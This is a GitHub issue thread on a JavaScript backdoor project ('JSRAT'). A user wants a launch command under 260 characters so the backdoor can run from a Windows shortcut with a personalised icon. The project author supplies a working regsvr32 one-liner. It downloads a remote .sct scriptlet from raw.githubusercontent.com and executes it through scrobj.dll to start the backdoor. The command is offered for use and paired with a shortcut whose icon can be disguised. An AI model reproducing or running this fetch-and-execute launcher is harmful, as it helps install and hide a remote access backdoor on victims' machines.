### ISSUE TITLE
Enhancement: Limit command length to 260 characters

### ISSUE THREAD

**Issue by wikijm** [3gstudent/Javascript-Backdoor#3]
Enhancement: Limit command length to 260 characters

This way, we will be able to create a Windows shortcut with personnalized icon

**Comment by 3gstudent** [comment]
Sure,I think  you can write a exe/vbs to run the JSRAT and the Windows shortcut to run the exe/vbs :)
Maybe a better way to solve it 
I'm trying

**Comment by 3gstudent** [comment]
@wikijm Found the solution:)
You can use regsvr32.exe to run .sct file with very few letters.
Reference:
https://twitter.com/subTee/status/722433402188599302
Check my new code,it contails the function of starting JSRAT on 127.0.0.1.
https://github.com/3gstudent/SCTPersistence/blob/master/ShortJSRAT.sct
And you can just use this to start JSRAT:
regsvr32 /s /n /u /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/ShortJSRAT.sct scrobj.dll

**Comment by wikijm** [comment]
Perfect ! 
Good job :-)
